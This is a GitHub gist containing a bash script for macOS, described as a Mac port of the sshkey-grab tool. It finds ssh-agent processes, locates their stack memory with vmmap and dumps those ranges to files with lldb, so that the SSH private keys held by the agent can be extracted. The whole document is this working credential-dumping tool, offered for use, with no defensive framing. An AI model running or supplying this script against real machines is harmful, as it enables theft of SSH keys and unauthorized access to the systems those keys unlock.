Created
September 6, 2015 05:34
-
-
Save james-huang/54fcf39cba1a9d8b827b to your computer and use it in GitHub Desktop.
Mac version of the memory dump here https://github.com/NetSPI/sshkey-grab
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| # First argument is the output directory. Use current directory if this is not specified. | |
| outputdir="." | |
| sshagentpids=$(ps aux|grep "[s]sh-agent" | awk '{print $2}') | |
| counter=0 | |
| # Iterate through the pids for each ssh-agent process | |
| for pid in $sshagentpids; do | |
| stacks=$(vmmap $pid|grep Stack) | |
| # grab the memory ranges for the stack(s) | |
| while read -r line; do | |
| stackmem="$(echo $line|sed -n 's/^Stack\ \([0-9a-f]*\)-\([0-9a-f]*\) .*$/\1 \2/p')" | |
| startstack=$(echo $stackmem | awk '{print $1}') | |
| stopstack=$(echo $stackmem | awk '{print $2}') | |
| if [ -z "$startstack" ]; then | |
| continue | |
| fi | |
| if [ -z "$stopstack" ]; then | |
| continue | |
| fi | |
| # dump the memory ranges in a file | |
| lldb -p $pid -o "memory read --outfile $outputdir/sshagent-$pid-$counter.stack --force --binary 0x$startstack 0x$stopstack" -o "script import os; os._exit(1)" | |
| # GDB doesn't error out properly if this fails. | |
| # This will provide feedback if the file is actually created | |
| if [ -f "$outputdir/sshagent-$pid-$counter.stack" ]; then | |
| echo "Created $outputdir/sshagent-$pid-$counter.stack" | |
| else | |
| echo "Error dumping memory from $pid" | |
| fi | |
| let counter++ | |
| done <<< "$stacks" | |
| done |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment